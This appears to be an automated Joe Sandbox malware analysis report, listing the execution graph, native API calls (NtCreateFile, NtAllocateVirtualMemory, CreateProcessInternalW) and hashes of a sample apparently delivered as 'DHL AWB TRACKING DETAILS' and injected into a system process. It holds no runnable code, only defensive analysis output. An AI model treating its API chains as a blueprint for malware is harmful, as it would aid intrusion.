                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                    • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                    • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                    • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.9%
                    Dynamic/Decrypted Code Coverage:2%
                    Signature Coverage:0%
                    Total number of Nodes:588
                    Total number of Limit Nodes:70
                    execution_graph 31822 a19080 31833 a1bd40 31822->31833 31824 a1919c 31825 a190bb 31825->31824 31836 a0acf0 31825->31836 31829 a19120 Sleep 31832 a1910d 31829->31832 31832->31824 31832->31829 31845 a18ca0 LdrLoadDll 31832->31845 31846 a18eb0 LdrLoadDll 31832->31846 31834 a1bd6d 31833->31834 31847 a1a540 31833->31847 31834->31825 31837 a0ad14 31836->31837 31838 a0ad50 LdrLoadDll 31837->31838 31839 a0ad1b 31837->31839 31838->31839 31840 a14e50 31839->31840 31841 a14e6a 31840->31841 31842 a14e5e 31840->31842 31841->31832 31842->31841 31854 a152d0 LdrLoadDll 31842->31854 31844 a14fbc 31844->31832 31845->31832 31846->31832 31848 a1a55c NtAllocateVirtualMemory 31847->31848 31850 a1af60 31847->31850 31848->31834 31851 a1af70 31850->31851 31853 a1af92 31850->31853 31852 a14e50 LdrLoadDll 31851->31852 31852->31853 31853->31848 31854->31844 31857 3369540 LdrInitializeThunk 31859 a1f10d 31862 a1b9d0 31859->31862 31863 a1b9f6 31862->31863 31870 a09d40 31863->31870 31865 a1ba02 31866 a1ba26 31865->31866 31878 a08f30 31865->31878 31916 a1a6b0 31866->31916 31919 a09c90 31870->31919 31872 a09d4d 31873 a09d54 31872->31873 31931 a09c30 31872->31931 31873->31865 31879 a08f57 31878->31879 32328 a0b1c0 31879->32328 31881 a08f69 32332 a0af10 31881->32332 31883 a08f86 31890 a08f8d 31883->31890 32403 a0ae40 LdrLoadDll 31883->32403 31885 a090f2 31885->31866 31887 a08ffc 32348 a0f410 31887->32348 31889 a09006 31889->31885 31891 a1bf90 2 API calls 31889->31891 31890->31885 32336 a0f380 31890->32336 31892 a0902a 31891->31892 31893 a1bf90 2 API calls 31892->31893 31894 a0903b 31893->31894 31895 a1bf90 2 API calls 31894->31895 31896 a0904c 31895->31896 32360 a0ca90 31896->32360 31898 a09059 31899 a14a50 8 API calls 31898->31899 31900 a09066 31899->31900 31901 a14a50 8 API calls 31900->31901 31902 a09077 31901->31902 31903 a09084 31902->31903 31904 a090a5 31902->31904 32370 a0d620 31903->32370 31905 a14a50 8 API calls 31904->31905 31912 a090c1 31905->31912 31908 a090e9 31910 a08d00 23 API calls 31908->31910 31910->31885 31911 a09092 32386 a08d00 31911->32386 31912->31908 32404 a0d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31912->32404 31917 a1a6cf 31916->31917 31918 a1af60 LdrLoadDll 31916->31918 31918->31917 31920 a09ca3 31919->31920 31970 a18bc0 LdrLoadDll 31919->31970 31950 a18a70 31920->31950 31923 a09cb6 31923->31872 31924 a09cac 31924->31923 31953 a1b2b0 31924->31953 31926 a09cf3 31926->31923 31964 a09ab0 31926->31964 31928 a09d13 31971 a09620 LdrLoadDll 31928->31971 31930 a09d25 31930->31872 32306 a1b5a0 31931->32306 31934 a1b5a0 LdrLoadDll 31935 a09c5b 31934->31935 31936 a1b5a0 LdrLoadDll 31935->31936 31937 a09c71 31936->31937 31938 a0f180 31937->31938 31939 a0f199 31938->31939 32310 a0b040 31939->32310 31941 a0f1ac 32314 a1a1e0 31941->32314 31944 a09d65 31944->31865 31946 a0f1d2 31947 a0f1fd 31946->31947 32321 a1a260 31946->32321 31949 a1a490 2 API calls 31947->31949 31949->31944 31972 a1a600 31950->31972 31954 a1b2c9 31953->31954 31975 a14a50 31954->31975 31956 a1b2e1 31957 a1b2ea 31956->31957 32014 a1b0f0 31956->32014 31957->31926 31959 a1b2fe 31959->31957 32032 a19f00 31959->32032 31967 a09aca 31964->31967 32284 a07ea0 31964->32284 31966 a09ad1 31966->31928 31967->31966 32297 a08160 31967->32297 31970->31920 31971->31930 31973 a1af60 LdrLoadDll 31972->31973 31974 a18a85 31973->31974 31974->31924 31976 a14d85 31975->31976 31977 a14a64 31975->31977 31976->31956 31977->31976 32040 a19c50 31977->32040 31980 a14b7d 31980->31956 31981 a14b90 32043 a1a360 31981->32043 31982 a14b73 32100 a1a460 LdrLoadDll 31982->32100 31985 a14bb7 31986 a1bdc0 2 API calls 31985->31986 31988 a14bc3 31986->31988 31987 a14d49 31990 a1a490 2 API calls 31987->31990 31988->31980 31988->31987 31989 a14d5f 31988->31989 31994 a14c52 31988->31994 32109 a14790 LdrLoadDll NtReadFile NtClose 31989->32109 31991 a14d50 31990->31991 31991->31956 31993 a14d72 31993->31956 31995 a14cb9 31994->31995 31997 a14c61 31994->31997 31995->31987 31996 a14ccc 31995->31996 32102 a1a2e0 31996->32102 31999 a14c66 31997->31999 32000 a14c7a 31997->32000 32101 a14650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31999->32101 32003 a14c97 32000->32003 32004 a14c7f 32000->32004 32003->31991 32058 a14410 32003->32058 32046 a146f0 32004->32046 32006 a14c70 32006->31956 32008 a14d2c 32106 a1a490 32008->32106 32009 a14c8d 32009->31956 32012 a14caf 32012->31956 32013 a14d38 32013->31956 32015 a1b101 32014->32015 32016 a1b113 32015->32016 32017 a1bd40 2 API calls 32015->32017 32016->31959 32018 a1b134 32017->32018 32127 a14070 32018->32127 32020 a1b180 32020->31959 32021 a1b157 32021->32020 32022 a14070 3 API calls 32021->32022 32024 a1b179 32022->32024 32024->32020 32159 a15390 32024->32159 32025 a1b20a 32026 a1b21a 32025->32026 32253 a1af00 LdrLoadDll 32025->32253 32169 a1ad70 32026->32169 32029 a1b248 32248 a19ec0 32029->32248 32033 a1af60 LdrLoadDll 32032->32033 32034 a19f1c 32033->32034 32278 336967a 32034->32278 32035 a19f37 32037 a1bdc0 32035->32037 32038 a1b359 32037->32038 32281 a1a670 32037->32281 32038->31926 32041 a1af60 LdrLoadDll 32040->32041 32042 a14b44 32041->32042 32042->31980 32042->31981 32042->31982 32044 a1af60 LdrLoadDll 32043->32044 32045 a1a37c NtCreateFile 32044->32045 32045->31985 32047 a1470c 32046->32047 32048 a1a2e0 LdrLoadDll 32047->32048 32049 a1472d 32048->32049 32050 a14734 32049->32050 32051 a14748 32049->32051 32052 a1a490 2 API calls 32050->32052 32053 a1a490 2 API calls 32051->32053 32054 a1473d 32052->32054 32055 a14751 32053->32055 32054->32009 32110 a1bfd0 LdrLoadDll RtlAllocateHeap 32055->32110 32057 a1475c 32057->32009 32059 a1445b 32058->32059 32060 a1448e 32058->32060 32062 a1a2e0 LdrLoadDll 32059->32062 32061 a145d9 32060->32061 32065 a144aa 32060->32065 32063 a1a2e0 LdrLoadDll 32061->32063 32064 a14476 32062->32064 32070 a145f4 32063->32070 32066 a1a490 2 API calls 32064->32066 32067 a1a2e0 LdrLoadDll 32065->32067 32068 a1447f 32066->32068 32069 a144c5 32067->32069 32068->32012 32072 a144e1 32069->32072 32073 a144cc 32069->32073 32123 a1a320 LdrLoadDll 32070->32123 32076 a144e6 32072->32076 32080 a144fc 32072->32080 32075 a1a490 2 API calls 32073->32075 32074 a1462e 32077 a1a490 2 API calls 32074->32077 32078 a144d5 32075->32078 32079 a1a490 2 API calls 32076->32079 32081 a14639 32077->32081 32078->32012 32082 a144ef 32079->32082 32085 a14501 32080->32085 32111 a1bf90 32080->32111 32081->32012 32082->32012 32094 a14513 32085->32094 32114 a1a410 32085->32114 32086 a14567 32087 a1457e 32086->32087 32122 a1a2a0 LdrLoadDll 32086->32122 32089 a14585 32087->32089 32090 a1459a 32087->32090 32092 a1a490 2 API calls 32089->32092 32091 a1a490 2 API calls 32090->32091 32093 a145a3 32091->32093 32092->32094 32095 a145cf 32093->32095 32117 a1bb90 32093->32117 32094->32012 32095->32012 32097 a145ba 32098 a1bdc0 2 API calls 32097->32098 32099 a145c3 32098->32099 32099->32012 32100->31980 32101->32006 32103 a1af60 LdrLoadDll 32102->32103 32104 a14d14 32103->32104 32105 a1a320 LdrLoadDll 32104->32105 32105->32008 32107 a1af60 LdrLoadDll 32106->32107 32108 a1a4ac NtClose 32107->32108 32108->32013 32109->31993 32110->32057 32112 a1bfa8 32111->32112 32124 a1a630 32111->32124 32112->32085 32115 a1a42c NtReadFile 32114->32115 32116 a1af60 LdrLoadDll 32114->32116 32115->32086 32116->32115 32118 a1bbb4 32117->32118 32119 a1bb9d 32117->32119 32118->32097 32119->32118 32120 a1bf90 2 API calls 32119->32120 32121 a1bbcb 32120->32121 32121->32097 32122->32087 32123->32074 32125 a1af60 LdrLoadDll 32124->32125 32126 a1a64c RtlAllocateHeap 32125->32126 32126->32112 32128 a14081 32127->32128 32130 a14089 32127->32130 32128->32021 32129 a1435c 32129->32021 32130->32129 32254 a1cf30 32130->32254 32132 a140dd 32133 a1cf30 2 API calls 32132->32133 32137 a140e8 32133->32137 32134 a14136 32136 a1cf30 2 API calls 32134->32136 32140 a1414a 32136->32140 32137->32134 32138 a1d060 3 API calls 32137->32138 32265 a1cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32137->32265 32138->32137 32139 a141a7 32141 a1cf30 2 API calls 32139->32141 32140->32139 32259 a1d060 32140->32259 32142 a141bd 32141->32142 32144 a141fa 32142->32144 32146 a1d060 3 API calls 32142->32146 32145 a1cf30 2 API calls 32144->32145 32147 a14205 32145->32147 32146->32142 32148 a1d060 3 API calls 32147->32148 32154 a1423f 32147->32154 32148->32147 32150 a14334 32267 a1cf90 LdrLoadDll RtlFreeHeap 32150->32267 32152 a1433e 32268 a1cf90 LdrLoadDll RtlFreeHeap 32152->32268 32266 a1cf90 LdrLoadDll RtlFreeHeap 32154->32266 32155 a14348 32269 a1cf90 LdrLoadDll RtlFreeHeap 32155->32269 32157 a14352 32270 a1cf90 LdrLoadDll RtlFreeHeap 32157->32270 32160 a153a1 32159->32160 32161 a14a50 8 API calls 32160->32161 32162 a153b7 32161->32162 32163 a153f2 32162->32163 32164 a15405 32162->32164 32168 a1540a 32162->32168 32165 a1bdc0 2 API calls 32163->32165 32166 a1bdc0 2 API calls 32164->32166 32167 a153f7 32165->32167 32166->32168 32167->32025 32168->32025 32170 a1ad84 32169->32170 32171 a1ac30 LdrLoadDll 32169->32171 32271 a1ac30 32170->32271 32171->32170 32174 a1ac30 LdrLoadDll 32175 a1ad96 32174->32175 32176 a1ac30 LdrLoadDll 32175->32176 32177 a1ad9f 32176->32177 32178 a1ac30 LdrLoadDll 32177->32178 32179 a1ada8 32178->32179 32180 a1ac30 LdrLoadDll 32179->32180 32181 a1adb1 32180->32181 32182 a1ac30 LdrLoadDll 32181->32182 32183 a1adbd 32182->32183 32184 a1ac30 LdrLoadDll 32183->32184 32185 a1adc6 32184->32185 32186 a1ac30 LdrLoadDll 32185->32186 32187 a1adcf 32186->32187 32188 a1ac30 LdrLoadDll 32187->32188 32189 a1add8 32188->32189 32190 a1ac30 LdrLoadDll 32189->32190 32191 a1ade1 32190->32191 32192 a1ac30 LdrLoadDll 32191->32192 32193 a1adea 32192->32193 32194 a1ac30 LdrLoadDll 32193->32194 32195 a1adf6 32194->32195 32196 a1ac30 LdrLoadDll 32195->32196 32197 a1adff 32196->32197 32198 a1ac30 LdrLoadDll 32197->32198 32199 a1ae08 32198->32199 32200 a1ac30 LdrLoadDll 32199->32200 32201 a1ae11 32200->32201 32202 a1ac30 LdrLoadDll 32201->32202 32203 a1ae1a 32202->32203 32204 a1ac30 LdrLoadDll 32203->32204 32205 a1ae23 32204->32205 32206 a1ac30 LdrLoadDll 32205->32206 32207 a1ae2f 32206->32207 32208 a1ac30 LdrLoadDll 32207->32208 32209 a1ae38 32208->32209 32210 a1ac30 LdrLoadDll 32209->32210 32211 a1ae41 32210->32211 32212 a1ac30 LdrLoadDll 32211->32212 32213 a1ae4a 32212->32213 32214 a1ac30 LdrLoadDll 32213->32214 32215 a1ae53 32214->32215 32216 a1ac30 LdrLoadDll 32215->32216 32217 a1ae5c 32216->32217 32218 a1ac30 LdrLoadDll 32217->32218 32219 a1ae68 32218->32219 32220 a1ac30 LdrLoadDll 32219->32220 32221 a1ae71 32220->32221 32222 a1ac30 LdrLoadDll 32221->32222 32223 a1ae7a 32222->32223 32224 a1ac30 LdrLoadDll 32223->32224 32225 a1ae83 32224->32225 32226 a1ac30 LdrLoadDll 32225->32226 32227 a1ae8c 32226->32227 32228 a1ac30 LdrLoadDll 32227->32228 32229 a1ae95 32228->32229 32230 a1ac30 LdrLoadDll 32229->32230 32231 a1aea1 32230->32231 32232 a1ac30 LdrLoadDll 32231->32232 32233 a1aeaa 32232->32233 32234 a1ac30 LdrLoadDll 32233->32234 32235 a1aeb3 32234->32235 32236 a1ac30 LdrLoadDll 32235->32236 32237 a1aebc 32236->32237 32238 a1ac30 LdrLoadDll 32237->32238 32239 a1aec5 32238->32239 32240 a1ac30 LdrLoadDll 32239->32240 32241 a1aece 32240->32241 32242 a1ac30 LdrLoadDll 32241->32242 32243 a1aeda 32242->32243 32244 a1ac30 LdrLoadDll 32243->32244 32245 a1aee3 32244->32245 32246 a1ac30 LdrLoadDll 32245->32246 32247 a1aeec 32246->32247 32247->32029 32249 a1af60 LdrLoadDll 32248->32249 32250 a19edc 32249->32250 32277 3369860 LdrInitializeThunk 32250->32277 32251 a19ef3 32251->31959 32253->32026 32255 a1cf40 32254->32255 32256 a1cf46 32254->32256 32255->32132 32257 a1bf90 2 API calls 32256->32257 32258 a1cf6c 32257->32258 32258->32132 32260 a1cfd0 32259->32260 32261 a1d02d 32260->32261 32262 a1bf90 2 API calls 32260->32262 32261->32140 32263 a1d00a 32262->32263 32264 a1bdc0 2 API calls 32263->32264 32264->32261 32265->32137 32266->32150 32267->32152 32268->32155 32269->32157 32270->32129 32272 a1ac4b 32271->32272 32273 a14e50 LdrLoadDll 32272->32273 32274 a1ac6b 32273->32274 32275 a14e50 LdrLoadDll 32274->32275 32276 a1ad17 32274->32276 32275->32276 32276->32174 32277->32251 32279 336968f LdrInitializeThunk 32278->32279 32280 3369681 32278->32280 32279->32035 32280->32035 32282 a1af60 LdrLoadDll 32281->32282 32283 a1a68c RtlFreeHeap 32282->32283 32283->32038 32285 a07eb0 32284->32285 32286 a07eab 32284->32286 32287 a1bd40 2 API calls 32285->32287 32286->31967 32293 a07ed5 32287->32293 32288 a07f38 32288->31967 32289 a19ec0 2 API calls 32289->32293 32290 a07f3e 32292 a07f64 32290->32292 32294 a1a5c0 2 API calls 32290->32294 32292->31967 32293->32288 32293->32289 32293->32290 32295 a1bd40 2 API calls 32293->32295 32300 a1a5c0 32293->32300 32296 a07f55 32294->32296 32295->32293 32296->31967 32298 a1a5c0 2 API calls 32297->32298 32299 a0817e 32298->32299 32299->31928 32301 a1af60 LdrLoadDll 32300->32301 32302 a1a5dc 32301->32302 32305 33696e0 LdrInitializeThunk 32302->32305 32303 a1a5f3 32303->32293 32305->32303 32307 a1b5c3 32306->32307 32308 a0acf0 LdrLoadDll 32307->32308 32309 a09c4a 32308->32309 32309->31934 32311 a0b063 32310->32311 32313 a0b0e0 32311->32313 32326 a19c90 LdrLoadDll 32311->32326 32313->31941 32315 a1af60 LdrLoadDll 32314->32315 32316 a0f1bb 32315->32316 32316->31944 32317 a1a7d0 32316->32317 32318 a1a7d3 32317->32318 32319 a1af60 LdrLoadDll 32318->32319 32320 a1a7ef LookupPrivilegeValueW 32319->32320 32320->31946 32322 a1af60 LdrLoadDll 32321->32322 32323 a1a27c 32322->32323 32327 3369910 LdrInitializeThunk 32323->32327 32324 a1a29b 32324->31947 32326->32313 32327->32324 32329 a0b1f0 32328->32329 32330 a0b040 LdrLoadDll 32329->32330 32331 a0b204 32330->32331 32331->31881 32333 a0af34 32332->32333 32405 a19c90 LdrLoadDll 32333->32405 32335 a0af6e 32335->31883 32337 a0f3ac 32336->32337 32338 a0b1c0 LdrLoadDll 32337->32338 32339 a0f3be 32338->32339 32406 a0f290 32339->32406 32342 a0f3d9 32343 a1a490 2 API calls 32342->32343 32346 a0f3e4 32342->32346 32343->32346 32344 a0f3f1 32345 a1a490 2 API calls 32344->32345 32347 a0f402 32344->32347 32345->32347 32346->31887 32347->31887 32349 a0f43c 32348->32349 32425 a0b2b0 32349->32425 32351 a0f44e 32352 a0f290 3 API calls 32351->32352 32353 a0f45f 32352->32353 32354 a0f481 32353->32354 32355 a0f469 32353->32355 32356 a0f492 32354->32356 32359 a1a490 2 API calls 32354->32359 32357 a0f474 32355->32357 32358 a1a490 2 API calls 32355->32358 32356->31889 32357->31889 32358->32357 32359->32356 32361 a0caa6 32360->32361 32362 a0cab0 32360->32362 32361->31898 32363 a0af10 LdrLoadDll 32362->32363 32364 a0cb4e 32363->32364 32365 a0cb74 32364->32365 32366 a0b040 LdrLoadDll 32364->32366 32365->31898 32367 a0cb90 32366->32367 32368 a14a50 8 API calls 32367->32368 32369 a0cbe5 32368->32369 32369->31898 32371 a0d646 32370->32371 32372 a0b040 LdrLoadDll 32371->32372 32373 a0d65a 32372->32373 32429 a0d310 32373->32429 32375 a0908b 32376 a0cc00 32375->32376 32377 a0cc26 32376->32377 32378 a0b040 LdrLoadDll 32377->32378 32379 a0cca9 32377->32379 32378->32379 32380 a0b040 LdrLoadDll 32379->32380 32381 a0cd16 32380->32381 32382 a0af10 LdrLoadDll 32381->32382 32383 a0cd7f 32382->32383 32384 a0b040 LdrLoadDll 32383->32384 32385 a0ce2f 32384->32385 32385->31911 32388 a08d14 32386->32388 32458 a0f6d0 32386->32458 32399 a08f25 32388->32399 32463 a143a0 32388->32463 32390 a08d70 32390->32399 32466 a08ab0 32390->32466 32393 a1cf30 2 API calls 32394 a08db2 32393->32394 32395 a1d060 3 API calls 32394->32395 32400 a08dc7 32395->32400 32396 a07ea0 4 API calls 32396->32400 32399->31866 32400->32396 32400->32399 32401 a08160 2 API calls 32400->32401 32402 a0c7b0 18 API calls 32400->32402 32471 a0f670 32400->32471 32475 a0f080 21 API calls 32400->32475 32401->32400 32402->32400 32403->31890 32404->31908 32405->32335 32407 a0f2aa 32406->32407 32415 a0f360 32406->32415 32408 a0b040 LdrLoadDll 32407->32408 32409 a0f2cc 32408->32409 32416 a19f40 32409->32416 32411 a0f30e 32419 a19f80 32411->32419 32414 a1a490 2 API calls 32414->32415 32415->32342 32415->32344 32417 a19f5c 32416->32417 32418 a1af60 LdrLoadDll 32416->32418 32417->32411 32418->32417 32420 a1af60 LdrLoadDll 32419->32420 32421 a19f9c 32420->32421 32424 3369fe0 LdrInitializeThunk 32421->32424 32422 a0f354 32422->32414 32424->32422 32426 a0b2d7 32425->32426 32427 a0b040 LdrLoadDll 32426->32427 32428 a0b313 32427->32428 32428->32351 32430 a0d327 32429->32430 32438 a0f710 32430->32438 32434 a0d39b 32435 a0d3a2 32434->32435 32449 a1a2a0 LdrLoadDll 32434->32449 32435->32375 32437 a0d3b5 32437->32375 32439 a0f735 32438->32439 32450 a081a0 32439->32450 32441 a0d36f 32446 a1a6e0 32441->32446 32442 a14a50 8 API calls 32444 a0f759 32442->32444 32444->32441 32444->32442 32445 a1bdc0 2 API calls 32444->32445 32457 a0f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32444->32457 32445->32444 32447 a1af60 LdrLoadDll 32446->32447 32448 a1a6ff CreateProcessInternalW 32447->32448 32448->32434 32449->32437 32451 a0829f 32450->32451 32452 a081b5 32450->32452 32451->32444 32452->32451 32453 a14a50 8 API calls 32452->32453 32454 a08222 32453->32454 32455 a1bdc0 2 API calls 32454->32455 32456 a08249 32454->32456 32455->32456 32456->32444 32457->32444 32459 a14e50 LdrLoadDll 32458->32459 32460 a0f6ef 32459->32460 32461 a0f6f6 SetErrorMode 32460->32461 32462 a0f6fd 32460->32462 32461->32462 32462->32388 32476 a0f4a0 32463->32476 32465 a143c6 32465->32390 32467 a1bd40 2 API calls 32466->32467 32470 a08ad5 32467->32470 32468 a08cea 32468->32393 32470->32468 32495 a19880 32470->32495 32472 a0f683 32471->32472 32543 a19e90 32472->32543 32475->32400 32477 a0f4bd 32476->32477 32483 a19fc0 32477->32483 32480 a0f505 32480->32465 32484 a1af60 LdrLoadDll 32483->32484 32485 a19fdc 32484->32485 32493 33699a0 LdrInitializeThunk 32485->32493 32486 a0f4fe 32486->32480 32488 a1a010 32486->32488 32489 a1af60 LdrLoadDll 32488->32489 32490 a1a02c 32489->32490 32494 3369780 LdrInitializeThunk 32490->32494 32491 a0f52e 32491->32465 32493->32486 32494->32491 32496 a1bf90 2 API calls 32495->32496 32497 a19897 32496->32497 32516 a09310 32497->32516 32499 a198b2 32500 a198f0 32499->32500 32501 a198d9 32499->32501 32504 a1bd40 2 API calls 32500->32504 32502 a1bdc0 2 API calls 32501->32502 32503 a198e6 32502->32503 32503->32468 32505 a1992a 32504->32505 32506 a1bd40 2 API calls 32505->32506 32507 a19943 32506->32507 32513 a19be4 32507->32513 32522 a1bd80 LdrLoadDll 32507->32522 32509 a19bc9 32510 a19bd0 32509->32510 32509->32513 32511 a1bdc0 2 API calls 32510->32511 32512 a19bda 32511->32512 32512->32468 32514 a1bdc0 2 API calls 32513->32514 32515 a19c39 32514->32515 32515->32468 32517 a09335 32516->32517 32518 a0acf0 LdrLoadDll 32517->32518 32519 a09368 32518->32519 32521 a0938d 32519->32521 32523 a0cf20 32519->32523 32521->32499 32522->32509 32524 a0cf4c 32523->32524 32525 a1a1e0 LdrLoadDll 32524->32525 32526 a0cf65 32525->32526 32527 a0cf6c 32526->32527 32534 a1a220 32526->32534 32527->32521 32531 a0cfa7 32532 a1a490 2 API calls 32531->32532 32533 a0cfca 32532->32533 32533->32521 32535 a1af60 LdrLoadDll 32534->32535 32536 a1a23c 32535->32536 32542 3369710 LdrInitializeThunk 32536->32542 32537 a0cf8f 32537->32527 32539 a1a810 32537->32539 32540 a1af60 LdrLoadDll 32539->32540 32541 a1a82f 32540->32541 32541->32531 32542->32537 32544 a1af60 LdrLoadDll 32543->32544 32545 a19eac 32544->32545 32548 3369840 LdrInitializeThunk 32545->32548 32546 a0f6ae 32546->32400 32548->32546

                    Executed Functions

                    Function 00A1A35B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 283 a1a35b-a1a376 284 a1a37c-a1a3b1 NtCreateFile 283->284 285 a1a377 call a1af60 283->285 285->284
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A1A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 82437735e1829cbc2ab766369f05a18e5e495c377fea6b7c4db7679d09851cd6
                    • Instruction ID: b1b997f37b1f5a4f9c74ddbf7b0cb460b415c4575b287cd9387b264f67066da1
                    • Opcode Fuzzy Hash: 82437735e1829cbc2ab766369f05a18e5e495c377fea6b7c4db7679d09851cd6
                    • Instruction Fuzzy Hash: 1C01C9B2205108AFDB58CF98DD85DEB77A9EF8C754F15824CFA4D97241C630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 286 a1a360-a1a3b1 call a1af60 NtCreateFile
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A1A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 7501417d4dc212a6854a84ae05c8d20f07784e8e5d29fe53a41dd17c82f7f5d8
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 40F0BDB2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A40A Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 520 a1a40a-a1a459 call a1af60 NtReadFile
                    APIs
                    • NtReadFile.NTDLL(00A14D72,5EB65239,FFFFFFFF,00A14A31,?,?,00A14D72,?,00A14A31,FFFFFFFF,5EB65239,00A14D72,?,00000000), ref: 00A1A455
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 2d2616fd0a9010a9e57371ae451d8d14e05dbc7de9c9122704609ed0a4c1dfaa
                    • Instruction ID: 990935f7ce3b0fcf721caefb6a567d8fb2087ab04180375472d38b9360e9c0f3
                    • Opcode Fuzzy Hash: 2d2616fd0a9010a9e57371ae451d8d14e05dbc7de9c9122704609ed0a4c1dfaa
                    • Instruction Fuzzy Hash: D2F0F9B6200108AFCB04DF88CC90DEB77A9EF8C754F158248FE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(00A14D72,5EB65239,FFFFFFFF,00A14A31,?,?,00A14D72,?,00A14A31,FFFFFFFF,5EB65239,00A14D72,?,00000000), ref: 00A1A455
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 685466b12cbfbc4f044f4df1169a5be27355b9a7a2186cc2d12add5259890f97
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 24F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A1A53A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A02D11,00002000,00003000,00000004), ref: 00A1A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: d74ddd8e2b6c2600f7b7fbe3e95ac90020fbdd3088ab27f8b96c5a74ae86c818
                    • Instruction ID: 0871e6e768220b76d925c0970712062322fc670d3f5fb30d12b3a71635b78c9f
                    • Opcode Fuzzy Hash: d74ddd8e2b6c2600f7b7fbe3e95ac90020fbdd3088ab27f8b96c5a74ae86c818
                    • Instruction Fuzzy Hash: 1AF0D4B6200208AFDB14DF89CC81EABB7A9EF88754F158149BA0997241C631E811CBA0
                    Uniqueness

